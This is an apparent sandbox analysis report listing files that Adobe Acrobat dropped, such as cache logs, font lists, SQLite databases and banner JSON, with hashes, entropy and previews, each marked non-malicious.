                                                    Entropy (8bit):4.97540442432775
                                                    Encrypted:false
                                                    SSDEEP:12:YH/um3RA8sqZcOssBdOg2HYcaq3QYiubSpDyP7E4T3y:Y2sRdsIRdMHT3QYhbSpDa7nby
                                                    MD5:8FEF4BD905474B359901BBFF50B979E7
                                                    SHA1:F90EC0D6540D443BC03E0B224FF18DC3AD109650
                                                    SHA-256:3F9536248316B24A9E30635A64A17FEB668BBAE213D061538B04145A5B738CF6
                                                    SHA-512:64246E0C8BA7CA108D11EDEC6A6BF2B4B75DF60B55CF75B9BAC1AD3467FB6464271FDB1CE2CD941CB587F156A883200245D43DBD28BE67C59EEAC46109DE9E8A
                                                    Malicious:false
                                                    Preview:{"net":{"http_server_properties":{"servers":[{"isolation":[],"server":"https://armmf.adobe.com","supports_spdy":true},{"alternative_service":[{"advertised_alpns":["h3"],"expiration":"13359129440655962","port":443,"protocol_str":"quic"}],"isolation":[],"network_stats":{"srtt":152570},"server":"https://chrome.cloudflare-dns.com","supports_spdy":true}],"supports_quic":{"address":"192.168.2.7","used_quic":true},"version":5},"network_qualities":{"CAESABiAgICA+P////8B":"4G"}}}

                                                    C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Session Storage\000003.log

                                                    Download File
                                                    Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
                                                    File Type:data
                                                    Category:dropped
                                                    Size (bytes):4099
                                                    Entropy (8bit):5.234188823330911
                                                    Encrypted:false
                                                    SSDEEP:96:CwNwpDGHqPySfkcr2smSX8I2OQCDh28wDtPaDzDKzj:CwNw1GHqPySfkcigoO3h28ytPa3Dwj
                                                    MD5:E2A8F7BE535B5C26E6F9478DA8FEF509
                                                    SHA1:72E6255AC96E4AD10C5CF2007426E11C9D40615A
                                                    SHA-256:B1722E74805375F4BFAB81AA66FF226A6B44EE79D5BEF2A4956AE9A72921F106
                                                    SHA-512:E975EED158E43816E95EDEFE59B9AF9CCD9C4B17C634B609424032675BE7DDB09461BCE1214B586E1E916B3DE65C32496213FA7B35899FBB193F40D234F16CF0
                                                    Malicious:false
                                                    Preview:*...#................version.1..namespace-.aw.o................next-map-id.1.Pnamespace-aa11265e_f35e_4e5d_85db_f163e1c0f691-https://rna-resource.acrobat.com/.0I.$.r................next-map-id.2.Snamespace-9a9aa6d6_c307_4dda_b6c0_dc91084c8e68-https://rna-v2-resource.acrobat.com/.1!...r................next-map-id.3.Snamespace-1fbd9dc5_70a3_4975_91b4_966e0915c27a-https://rna-v2-resource.acrobat.com/.2..N.o................next-map-id.4.Pnamespace-0e0aed8d_6d6f_4be0_b28f_8e02158bc792-https://rna-resource.acrobat.com/.3*.z.o................next-map-id.5.Pnamespace-52652c26_09c2_43f2_adf7_da56a1f00d32-https://rna-resource.acrobat.com/.4.{.^...............Pnamespace-aa11265e_f35e_4e5d_85db_f163e1c0f691-https://rna-resource.acrobat.com/.C..r................next-map-id.6.Snamespace-3a89c6b0_72b9_411a_9e44_fa247f34ac91-https://rna-v2-resource.acrobat.com/.5.q._r................next-map-id.7.Snamespace-02b23955_9103_42e0_ba64_3f8683969652-https://rna-v2-resource.acrobat.com/.6..d.o..............

                                                    C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Session Storage\LOG

                                                    Download File
                                                    Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
                                                    File Type:ASCII text
                                                    Category:dropped
                                                    Size (bytes):332
                                                    Entropy (8bit):5.137154002699195
                                                    Encrypted:false
                                                    SSDEEP:6:Dt1UpGpL+q2PcNwi2nKuAl9OmbzNMxIFUt86t1U1/KWZmw+6t1UEhLVkwOcNwi2v:DfUpGpL+vLZHAa8jFUt86fU1CW/+6fUt
                                                    MD5:4CF6E63CAA83049C07404C395D86B8F3
                                                    SHA1:8BB1BA6AD468BC0CB41DCAAFDDF4E2E65BF16723
                                                    SHA-256:B58675F211F6F17B1CB98963B34BA2F7EBFD4480AD0237ABFC1E6BACDA63CB6F
                                                    SHA-512:BA759D1F408C05E771485011DB57F81CF6E4B0EC7ABFABEC643FEFB4DF304BEF98AA82C88D4C0BFDD4D1EDAF045605A914EDF690148773D0903666B7047967C9
                                                    Malicious:false
                                                    Preview:2024/05/01-15:17:11.203 1ccc Reusing MANIFEST C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Session Storage/MANIFEST-000001.2024/05/01-15:17:11.213 1ccc Recovering log #3.2024/05/01-15:17:11.214 1ccc Reusing old log C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Session Storage/000003.log .

                                                    C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Session Storage\LOG.old (copy)

                                                    Download File
                                                    Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
                                                    File Type:ASCII text
                                                    Category:dropped
                                                    Size (bytes):332
                                                    Entropy (8bit):5.137154002699195
                                                    Encrypted:false
                                                    SSDEEP:6:Dt1UpGpL+q2PcNwi2nKuAl9OmbzNMxIFUt86t1U1/KWZmw+6t1UEhLVkwOcNwi2v:DfUpGpL+vLZHAa8jFUt86fU1CW/+6fUt
                                                    MD5:4CF6E63CAA83049C07404C395D86B8F3
                                                    SHA1:8BB1BA6AD468BC0CB41DCAAFDDF4E2E65BF16723
                                                    SHA-256:B58675F211F6F17B1CB98963B34BA2F7EBFD4480AD0237ABFC1E6BACDA63CB6F
                                                    SHA-512:BA759D1F408C05E771485011DB57F81CF6E4B0EC7ABFABEC643FEFB4DF304BEF98AA82C88D4C0BFDD4D1EDAF045605A914EDF690148773D0903666B7047967C9
                                                    Malicious:false
                                                    Preview:2024/05/01-15:17:11.203 1ccc Reusing MANIFEST C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Session Storage/MANIFEST-000001.2024/05/01-15:17:11.213 1ccc Recovering log #3.2024/05/01-15:17:11.214 1ccc Reusing old log C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Session Storage/000003.log .

                                                    C:\Users\user\AppData\LocalLow\Adobe\Acrobat\DC\ConnectorIcons\icon-240501131714Z-209.bmp

                                                    Download File
                                                    Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                                    File Type:PC bitmap, Windows 3.x format, 107 x -152 x 32, cbSize 65110, bits offset 54
                                                    Category:dropped
                                                    Size (bytes):65110
                                                    Entropy (8bit):0.801499700567787
                                                    Encrypted:false
                                                    SSDEEP:48:xQBSr4+zPafvHiSa53Ez8cADHjtcvfpb8gA5pamCedAYMlG+T0qlkPXwBjqaOCAG:xCSrDynPa504LXiKp5AY6G+DkPvaO5dE
                                                    MD5:4A3A446C3981FC8A66F8C62BC09995F4
                                                    SHA1:932C324118118494DEA7DE3A72411824E8EB00C3
                                                    SHA-256:2A018093DE5ABF4099D4A4B381F370992416B49CFA3368F7D726888A85843F0F
                                                    SHA-512:E05B4E860BECC71D1FBAF639AF7CD92765378EDE5F3F28A8DECBC62EE0D2FC91A3468A6D361589456036EDD6717AA676DCEEDE5A28D88A9E584287BEFF5CD503
                                                    Malicious:false
                                                    Preview:BMV.......6...(...k...h..... ...........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                    C:\Users\user\AppData\LocalLow\Adobe\Acrobat\DC\ReaderMessages

                                                    Download File
                                                    Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                                    File Type:SQLite 3.x database, last written using SQLite version 3040000, file counter 15, database pages 21, cookie 0x5, schema 4, UTF-8, version-valid-for 15
                                                    Category:dropped
                                                    Size (bytes):86016
                                                    Entropy (8bit):4.438750203444174
                                                    Encrypted:false
                                                    SSDEEP:384:yeaci5GNiBA7vEmzKNURFXoD1NC1SK0gkzPlrFzqFK/WY+lUTTcKqZ5bEmzVz:1hurVgazUpUTTGt
                                                    MD5:23D04B9E6AD2A518249A2E10869D988C
                                                    SHA1:6E013BBA76A08386C564AFBD6D69EB8D4A682770
                                                    SHA-256:7489EC96DFB350A5A263658DA948EEA4A93D8050B0812AEBB342DB0499E2FE1C
                                                    SHA-512:B581AF0CABC8B8CCF330C3A0205A0E5120233A2C7BB901A6496E7BF3D85605916AF4D3AE2B092F3F882EA47CEF73E84D15DE082DD50BEF8F0390E64D8D0A4F14
                                                    Malicious:false
                                                    Preview:SQLite format 3......@ ..........................................................................c.......1........T...U.1.D............................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                    C:\Users\user\AppData\LocalLow\Adobe\Acrobat\DC\ReaderMessages-journal

                                                    Download File
                                                    Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                                    File Type:SQLite Rollback Journal
                                                    Category:dropped
                                                    Size (bytes):8720
                                                    Entropy (8bit):3.773158596797572
                                                    Encrypted:false
                                                    SSDEEP:48:7Mfp/E2ioyVnioy3DoWoy1CABoy1rKOioy1noy1AYoy1Wioy1hioybioyEoy1noK:7opjun0iAVXKQVyb9IVXEBodRBku
                                                    MD5:237325B77D11F136284D6CE279475211
                                                    SHA1:173671EC3E77CAEAD78AFBCFF1E5FFB38A90F4F2
                                                    SHA-256:0FEC3C26DF27C42B94D2D6681C7907BF301F4A476E3EE8155013C55FFA3D5342
                                                    SHA-512:DB4D4FC7C07FE59A9DF4D25DF61E95E3EFFCFCEB26579416653D868AA44BF73A9C6E12505DAC6D004C37437CCCCF0BA73628958F14E6B658A18273FF5D1AB9C5
                                                    Malicious:false
                                                    Preview:.... .c.....e..................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................T...[...b...r...t...}.....L..............................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                    C:\Users\user\AppData\Local\Adobe\Acrobat\DC\AdobeFnt23.lst.4856

                                                    Download File
                                                    Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                                    File Type:PostScript document text
                                                    Category:dropped
                                                    Size (bytes):185099
                                                    Entropy (8bit):5.182478651346149
                                                    Encrypted:false
                                                    SSDEEP:1536:JsVoWFMWQNk1KUQII5J5lZRT95tFiQibVJDS+Stu/3IVQBrp3Mv9df0CXLhNHqTM:bViyFXE07ZmandGCyN2mM7IgOP0gC
                                                    MD5:94185C5850C26B3C6FC24ABC385CDA58
                                                    SHA1:42F042285037B0C35BC4226D387F88C770AB5CAA
                                                    SHA-256:1D9979A98F7C4B3073BC03EE9D974CCE9FE265A1E2F8E9EE26A4A5528419E808
                                                    SHA-512:652657C00DD6AED1A132E1DFD0B97B8DF233CDC257DA8F75AC9F2428F2F7715186EA8B3B24F8350D409CC3D49AFDD36E904B077E28B4AD3E4D08B4DBD5714344
                                                    Malicious:false
                                                    Preview:%!Adobe-FontList 1.23.%Locale:0x809..%BeginFont.Handler:WinTTHandler.FontType:TrueType.FontName:AgencyFB-Reg.FamilyName:Agency FB.StyleName:Regular.MenuName:Agency FB.StyleBits:0.WeightClass:400.WidthClass:3.AngleClass:0.FullName:Agency FB.WritingScript:Roman.hasSVG:no.hasCOLR:no.VariableFontType:NonVariableFont.WinName:Agency FB.FileLength:58920.NameArray:0,Win,1,Agency FB.NameArray:0,Mac,4,Agency FB.NameArray:0,Win,1,Agency FB.%EndFont..%BeginFont.Handler:WinTTHandler.FontType:TrueType.FontName:AgencyFB-Bold.FamilyName:Agency FB.StyleName:Bold.MenuName:Agency FB.StyleBits:2.WeightClass:700.WidthClass:3.AngleClass:0.FullName:Agency FB Bold.WritingScript:Roman.hasSVG:no.hasCOLR:no.VariableFontType:NonVariableFont.WinName:Agency FB Bold.FileLength:60656.NameArray:0,Win,1,Agency FB.NameArray:0,Mac,4,Agency FB Bold.NameArray:0,Win,1,Agency FB.%EndFont..%BeginFont.Handler:WinTTHandler.FontType:TrueType.FontName:Algerian.FamilyName:Algerian.StyleName:Regular.MenuName:Algerian.StyleBits:0.We

                                                    C:\Users\user\AppData\Local\Adobe\Acrobat\DC\AdobeSysFnt23.lst (copy)

                                                    Download File
                                                    Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                                    File Type:PostScript document text
                                                    Category:dropped
                                                    Size (bytes):185099
                                                    Entropy (8bit):5.182478651346149
                                                    Encrypted:false
                                                    SSDEEP:1536:JsVoWFMWQNk1KUQII5J5lZRT95tFiQibVJDS+Stu/3IVQBrp3Mv9df0CXLhNHqTM:bViyFXE07ZmandGCyN2mM7IgOP0gC
                                                    MD5:94185C5850C26B3C6FC24ABC385CDA58
                                                    SHA1:42F042285037B0C35BC4226D387F88C770AB5CAA
                                                    SHA-256:1D9979A98F7C4B3073BC03EE9D974CCE9FE265A1E2F8E9EE26A4A5528419E808
                                                    SHA-512:652657C00DD6AED1A132E1DFD0B97B8DF233CDC257DA8F75AC9F2428F2F7715186EA8B3B24F8350D409CC3D49AFDD36E904B077E28B4AD3E4D08B4DBD5714344
                                                    Malicious:false
                                                    Preview:%!Adobe-FontList 1.23.%Locale:0x809..%BeginFont.Handler:WinTTHandler.FontType:TrueType.FontName:AgencyFB-Reg.FamilyName:Agency FB.StyleName:Regular.MenuName:Agency FB.StyleBits:0.WeightClass:400.WidthClass:3.AngleClass:0.FullName:Agency FB.WritingScript:Roman.hasSVG:no.hasCOLR:no.VariableFontType:NonVariableFont.WinName:Agency FB.FileLength:58920.NameArray:0,Win,1,Agency FB.NameArray:0,Mac,4,Agency FB.NameArray:0,Win,1,Agency FB.%EndFont..%BeginFont.Handler:WinTTHandler.FontType:TrueType.FontName:AgencyFB-Bold.FamilyName:Agency FB.StyleName:Bold.MenuName:Agency FB.StyleBits:2.WeightClass:700.WidthClass:3.AngleClass:0.FullName:Agency FB Bold.WritingScript:Roman.hasSVG:no.hasCOLR:no.VariableFontType:NonVariableFont.WinName:Agency FB Bold.FileLength:60656.NameArray:0,Win,1,Agency FB.NameArray:0,Mac,4,Agency FB Bold.NameArray:0,Win,1,Agency FB.%EndFont..%BeginFont.Handler:WinTTHandler.FontType:TrueType.FontName:Algerian.FamilyName:Algerian.StyleName:Regular.MenuName:Algerian.StyleBits:0.We

                                                    C:\Users\user\AppData\Local\Adobe\Acrobat\DC\SOPHIA\Acrobat\Files\ACROBAT_READER_MASTER_SURFACEID

                                                    Download File
                                                    Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                                    File Type:JSON data
                                                    Category:dropped
                                                    Size (bytes):295
                                                    Entropy (8bit):5.367861633163029
                                                    Encrypted:false
                                                    SSDEEP:6:YEQXJ2HXDEgjsKPqYWsGiIPEeOF0Y6pRoAvJM3g98kUwPeUkwRe9:YvXKXRKsdTeOGuGMbLUkee9
                                                    MD5:07D1952DAEF87FC02FAEBBF6C010C5EF
                                                    SHA1:08AF0EBEA025B455B240E20665610F7DF6970497
                                                    SHA-256:C17E377CD6002F9EBF4FC6E2808A2EEC176CE1BFCD7FA03CD3C7CFAAC80937D0
                                                    SHA-512:08A0CFDABEAF439C2D3B91BC11FB0803C6E6DC86AA9554211877695D08773C72B306BFE7483B8849AF49A4DC333CCC430ACD3BD543AE4BABD96B8DC82615F6FC
                                                    Malicious:false
                                                    Preview:{"analyticsData":{"responseGUID":"4a5b680a-ef14-4fec-b4b5-b0d12f733edb","sophiaUUID":"83ABFDB2-FC78-4BD3-A96C-A13541192F3B"},"encodingScheme":true,"expirationDTS":1714747221874,"statusCode":200,"surfaceID":"ACROBAT_READER_MASTER_SURFACEID","surfaceObj":{"SurfaceAnalytics":{},"containerMap":{}}}

                                                    C:\Users\user\AppData\Local\Adobe\Acrobat\DC\SOPHIA\Acrobat\Files\DC_FirstMile_Home_View_Surface

                                                    Download File
                                                    Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                                    File Type:JSON data
                                                    Category:dropped
                                                    Size (bytes):294
                                                    Entropy (8bit):5.301273318972743
                                                    Encrypted:false
                                                    SSDEEP:6:YEQXJ2HXDEgjsKPqYWsGiIPEeOF0Y6pRoAvJfBoTfXpnrPeUkwRe9:YvXKXRKsdTeOGuGWTfXcUkee9
                                                    MD5:544E54B29B74BBE67484FFE3329C339C
                                                    SHA1:4D2673FFD7174C2764BD163E7651E4ADE434E9CE
                                                    SHA-256:5827466EB7748342686F96DC70CE8229F2E48CE223EDF00F884CEC33AA2CF0D4
                                                    SHA-512:D0A6155E8F34679E17AFEC3010009CDCDFB80BF03C9B34227F930D282BA7D7B9B02AFC3A4AC4B3CFFF1470402DA4EAFB2C84E3B95D941CCF2F03070F42934EB4
                                                    Malicious:false
                                                    Preview:{"analyticsData":{"responseGUID":"4a5b680a-ef14-4fec-b4b5-b0d12f733edb","sophiaUUID":"83ABFDB2-FC78-4BD3-A96C-A13541192F3B"},"encodingScheme":true,"expirationDTS":1714747221874,"statusCode":200,"surfaceID":"DC_FirstMile_Home_View_Surface","surfaceObj":{"SurfaceAnalytics":{},"containerMap":{}}}

                                                    C:\Users\user\AppData\Local\Adobe\Acrobat\DC\SOPHIA\Acrobat\Files\DC_FirstMile_Right_Sec_Surface

                                                    Download File
                                                    Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                                    File Type:JSON data
                                                    Category:dropped
                                                    Size (bytes):294
                                                    Entropy (8bit):5.280541112887412
                                                    Encrypted:false
                                                    SSDEEP:6:YEQXJ2HXDEgjsKPqYWsGiIPEeOF0Y6pRoAvJfBD2G6UpnrPeUkwRe9:YvXKXRKsdTeOGuGR22cUkee9
                                                    MD5:42D5DCEF397773A80EDCD1BA8DBCC809
                                                    SHA1:4AC30B1D6F8177ABC0DC2979E185D8B5CB8B771C
                                                    SHA-256:E5FEEA28D6CA77EC80D150C109D35992054EF8D67226D374DF83ADBE63E3E8CA
                                                    SHA-512:3D296D5854AE6617BFBED7FD0C446800E6318EC50EAC8D7ECA4EE491FC921A05463717554EF95F0ACF831E085277464305837BEFA1F913C5A8628D8BA97EB880
                                                    Malicious:false
                                                    Preview:{"analyticsData":{"responseGUID":"4a5b680a-ef14-4fec-b4b5-b0d12f733edb","sophiaUUID":"83ABFDB2-FC78-4BD3-A96C-A13541192F3B"},"encodingScheme":true,"expirationDTS":1714747221874,"statusCode":200,"surfaceID":"DC_FirstMile_Right_Sec_Surface","surfaceObj":{"SurfaceAnalytics":{},"containerMap":{}}}

                                                    C:\Users\user\AppData\Local\Adobe\Acrobat\DC\SOPHIA\Acrobat\Files\DC_READER_LAUNCH_CARD

                                                    Download File
                                                    Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                                    File Type:JSON data
                                                    Category:dropped
                                                    Size (bytes):285
                                                    Entropy (8bit):5.354897769540505
                                                    Encrypted:false
                                                    SSDEEP:6:YEQXJ2HXDEgjsKPqYWsGiIPEeOF0Y6pRoAvJfPmwrPeUkwRe9:YvXKXRKsdTeOGuGH56Ukee9
                                                    MD5:CD5EC1CBE54AF74599401AB2116DD183
                                                    SHA1:1231C5E87B12E40722BB93C91254325E36AA1C29
                                                    SHA-256:C4F9A4E6BE63A76D6899B2342AC94255B5BBA7E344D5EF1CB9CF61DA8F5A32EE
                                                    SHA-512:C776834BE97616B4617A44DA1837F29F1514A00C3C516C00115CC7D81102D43C2506C74837ACB370D91246ACC793C0A85A8DA1D8DBDECFA97680FCA324970BE5
                                                    Malicious:false
                                                    Preview:{"analyticsData":{"responseGUID":"4a5b680a-ef14-4fec-b4b5-b0d12f733edb","sophiaUUID":"83ABFDB2-FC78-4BD3-A96C-A13541192F3B"},"encodingScheme":true,"expirationDTS":1714747221874,"statusCode":200,"surfaceID":"DC_READER_LAUNCH_CARD","surfaceObj":{"SurfaceAnalytics":{},"containerMap":{}}}

                                                    C:\Users\user\AppData\Local\Adobe\Acrobat\DC\SOPHIA\Acrobat\Files\DC_Reader_Convert_LHP_Banner

                                                    Download File
                                                    Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                                    File Type:JSON data
                                                    Category:dropped
                                                    Size (bytes):292
                                                    Entropy (8bit):5.30299530468373
                                                    Encrypted:false
                                                    SSDEEP:6:YEQXJ2HXDEgjsKPqYWsGiIPEeOF0Y6pRoAvJfJWCtMdPeUkwRe9:YvXKXRKsdTeOGuGBS8Ukee9
                                                    MD5:3F535623C1E89336DF1218B56331FEBE
                                                    SHA1:B26CF5BBEC4836A39CE1A0C42B900FD1498870DE
                                                    SHA-256:5CCEA0BA2FF1C675B749DC27794B7E80F1B9D2707D8475A6E2374466CF104241
                                                    SHA-512:BA2DBB48306329F71AA97AE18A7386BEE579A46423E41E2E6E51156C5E6548DFEE5CB45113C4CFB5231AAFD983ED419F8EC6A26EF047728333BF6B01F7D41ECA
                                                    Malicious:false
                                                    Preview:{"analyticsData":{"responseGUID":"4a5b680a-ef14-4fec-b4b5-b0d12f733edb","sophiaUUID":"83ABFDB2-FC78-4BD3-A96C-A13541192F3B"},"encodingScheme":true,"expirationDTS":1714747221874,"statusCode":200,"surfaceID":"DC_Reader_Convert_LHP_Banner","surfaceObj":{"SurfaceAnalytics":{},"containerMap":{}}}

                                                    C:\Users\user\AppData\Local\Adobe\Acrobat\DC\SOPHIA\Acrobat\Files\DC_Reader_Disc_LHP_Banner

                                                    Download File
                                                    Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                                    File Type:JSON data
                                                    Category:dropped
                                                    Size (bytes):289
                                                    Entropy (8bit):5.289960892892757
                                                    Encrypted:false
                                                    SSDEEP:6:YEQXJ2HXDEgjsKPqYWsGiIPEeOF0Y6pRoAvJf8dPeUkwRe9:YvXKXRKsdTeOGuGU8Ukee9
                                                    MD5:E0B5811780728E730F4EC96DFFB883ED
                                                    SHA1:D065148B0D12FA2B45F14CC63A90879403860703
                                                    SHA-256:12372DE4BC9337537060BB3B08FB866BF794A68559B204FFF9C46E908DC03A70
                                                    SHA-512:15EB344646459F535642B5A10FA9E837FCB68937E181923D6221CC616AD55AD0AAA7D1E220E442AAC8E6A93F775955B701541F3C45475FA25C540824FFA13D04
                                                    Malicious:false
                                                    Preview:{"analyticsData":{"responseGUID":"4a5b680a-ef14-4fec-b4b5-b0d12f733edb","sophiaUUID":"83ABFDB2-FC78-4BD3-A96C-A13541192F3B"},"encodingScheme":true,"expirationDTS":1714747221874,"statusCode":200,"surfaceID":"DC_Reader_Disc_LHP_Banner","surfaceObj":{"SurfaceAnalytics":{},"containerMap":{}}}

                                                    C:\Users\user\AppData\Local\Adobe\Acrobat\DC\SOPHIA\Acrobat\Files\DC_Reader_Disc_LHP_Retention

                                                    Download File
                                                    Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                                    File Type:JSON data
                                                    Category:dropped
                                                    Size (bytes):292
                                                    Entropy (8bit):5.293690043299836
                                                    Encrypted:false
                                                    SSDEEP:6:YEQXJ2HXDEgjsKPqYWsGiIPEeOF0Y6pRoAvJfQ1rPeUkwRe9:YvXKXRKsdTeOGuGY16Ukee9
                                                    MD5:733A390BD5EB85B399B106E5D6FB7E66
                                                    SHA1:93A2FB0608F82DC6AABEE76B7141BE535998BFE3
                                                    SHA-256:E35B96412FA320129A1D486C39E5E77FE999D1AEB4D9F600CC2160214FEBDAA2
                                                    SHA-512:BF4CC8637783BD2A6C4DDA7CA0AC71F6A56283EFCF2983E2AC9DBDB5D2DF2228E902C0E79F9623066FCD82BCE13E9456BE09D81269C7136F53DDE602B4E024AF
                                                    Malicious:false
                                                    Preview:{"analyticsData":{"responseGUID":"4a5b680a-ef14-4fec-b4b5-b0d12f733edb","sophiaUUID":"83ABFDB2-FC78-4BD3-A96C-A13541192F3B"},"encodingScheme":true,"expirationDTS":1714747221874,"statusCode":200,"surfaceID":"DC_Reader_Disc_LHP_Retention","surfaceObj":{"SurfaceAnalytics":{},"containerMap":{}}}

                                                    C:\Users\user\AppData\Local\Adobe\Acrobat\DC\SOPHIA\Acrobat\Files\DC_Reader_Edit_LHP_Banner

                                                    Download File
                                                    Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                                    File Type:JSON data
                                                    Category:dropped
                                                    Size (bytes):289
                                                    Entropy (8bit):5.308922060165751
                                                    Encrypted:false
                                                    SSDEEP:6:YEQXJ2HXDEgjsKPqYWsGiIPEeOF0Y6pRoAvJfFldPeUkwRe9:YvXKXRKsdTeOGuGz8Ukee9
                                                    MD5:F0A1071759C56A3B1CB8F9356F1B4E89
                                                    SHA1:69EB99E9D581463FAE98981033E09B833FC7BC6F
                                                    SHA-256:02BC065FF0718420A1CD88EDE0CD5CA0E91F56258031B11BF186437B42FC910B
                                                    SHA-512:325DA6BC96787D20FD2F78ABF181BFE4FB765F7D08744C78B820B7B431FA7BAB4880C94FC84F349534729ED8E00ED531B621C84ED51B25B087FB1663F838F6FF
                                                    Malicious:false
                                                    Preview:{"analyticsData":{"responseGUID":"4a5b680a-ef14-4fec-b4b5-b0d12f733edb","sophiaUUID":"83ABFDB2-FC78-4BD3-A96C-A13541192F3B"},"encodingScheme":true,"expirationDTS":1714747221874,"statusCode":200,"surfaceID":"DC_Reader_Edit_LHP_Banner","surfaceObj":{"SurfaceAnalytics":{},"containerMap":{}}}

                                                    C:\Users\user\AppData\Local\Adobe\Acrobat\DC\SOPHIA\Acrobat\Files\DC_Reader_Home_LHP_Trial_Banner

                                                    Download File
                                                    Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                                    File Type:JSON data
                                                    Category:dropped
                                                    Size (bytes):1372
                                                    Entropy (8bit):5.738134474580361
                                                    Encrypted:false
                                                    SSDEEP:24:Yv6XRKmeOTKLgENRcbrZbq00iCCBrwJo++ns8ct4mFJNt:YvAZemEgigrNt0wSJn+ns8cvFJP
                                                    MD5:983CCF3D504F24CEB75016E403D2F96E
                                                    SHA1:D59A353354B12E7EB57FBEFA493FA1A370B291EA
                                                    SHA-256:10B96112AFCCABC0BF422BF1F295D88C54E8348F08E51E0D691D2656C542F26C
                                                    SHA-512:9F6979DD7B392C213A596332296A4851955D9F84F27ED2D58398D23EAEF513D3FBEF257D3A5CFCC49A2C1D3FD33E281E12B49AD62D9C2681ED2C966927ED1D8B
                                                    Malicious:false
                                                    Preview:{"analyticsData":{"responseGUID":"4a5b680a-ef14-4fec-b4b5-b0d12f733edb","sophiaUUID":"83ABFDB2-FC78-4BD3-A96C-A13541192F3B"},"encodingScheme":true,"expirationDTS":1714747221874,"statusCode":200,"surfaceID":"DC_Reader_Home_LHP_Trial_Banner","surfaceObj":{"SurfaceAnalytics":{"surfaceId":"DC_Reader_Home_LHP_Trial_Banner"},"containerMap":{"1":{"containerAnalyticsData":{"actionBlockId":"79887_247329ActionBlock_0","campaignId":79887,"containerId":"1","controlGroupId":"","treatmentId":"acc56846-d570-4500-a26e-7f8cf2b4acad","variationId":"247329"},"containerId":1,"containerLabel":"JSON for DC_Reader_Home_LHP_Trial_Banner","content":{"data":"eyJjdGEiOnsidHlwZSI6ImJ1dHRvbiIsInRleHQiOiJUcnkgQWNyb2JhdCBQcm8ifSwidWkiOnsidGl0bGVfc3R5bGluZyI6eyJmb250X3NpemUiOiIxNSIsImZvbnRfc3R5bGUiOiIwIn0sImRlc2NyaXB0aW9uX3N0eWxpbmciOnsiZm9udF9zaXplIjoiMTMiLCJmb250X3N0eWxlIjoiLTEifSwidGl0bGUiOiJGcmVlIDctZGF5IHRyaWFsIiwiZGVzY3JpcHRpb24iOiJHZXQgdW5saW1pdGVkIGFjY2VzcyB0byBwcmVtaXVtIFBERiBhbmQgZS1zaWduaW5nIHRvb2xzLiIsImJ

                                                    C:\Users\user\AppData\Local\Adobe\Acrobat\DC\SOPHIA\Acrobat\Files\DC_Reader_More_LHP_Banner

                                                    Download File
                                                    Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                                    File Type:JSON data
                                                    Category:dropped
                                                    Size (bytes):289
                                                    Entropy (8bit):5.296099696750638
                                                    Encrypted:false
                                                    SSDEEP:6:YEQXJ2HXDEgjsKPqYWsGiIPEeOF0Y6pRoAvJfYdPeUkwRe9:YvXKXRKsdTeOGuGg8Ukee9
                                                    MD5:5E246B37423C2985F3634C60D55E9CE9
                                                    SHA1:27097EE39D353BCEE2E4401EF981F53684CBB2CE
                                                    SHA-256:C61BDC1044FC10C051EB0DD8E35E74BAE33AADCEC52912556CC079985DDB9C4D
                                                    SHA-512:FF4BB5EFBF6C13F01C7DA8225CD1AC110BF9AD00C2AEB8692FD062E9362454DED49EA676C0EAB22F603AEF40E41503EEF124BD2E80340913CA9BE567299E929A
                                                    Malicious:false
                                                    Preview:{"analyticsData":{"responseGUID":"4a5b680a-ef14-4fec-b4b5-b0d12f733edb","sophiaUUID":"83ABFDB2-FC78-4BD3-A96C-A13541192F3B"},"encodingScheme":true,"expirationDTS":1714747221874,"statusCode":200,"surfaceID":"DC_Reader_More_LHP_Banner","surfaceObj":{"SurfaceAnalytics":{},"containerMap":{}}}

                                                    C:\Users\user\AppData\Local\Adobe\Acrobat\DC\SOPHIA\Acrobat\Files\DC_Reader_RHP_Banner

                                                    Download File
                                                    Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                                    File Type:JSON data
                                                    Category:dropped
                                                    Size (bytes):1395
                                                    Entropy (8bit):5.77681579502978
                                                    Encrypted:false
                                                    SSDEEP:24:Yv6XRKmeOurLgEGOc93W2JeFmaR7CQzttgBcu141CjrWpHfRzVCV9FJNl:YvAZetHgDv3W2aYQfgB5OUupHrQ9FJD
                                                    MD5:23FC51494A15A5BE3B29AC5C91134869
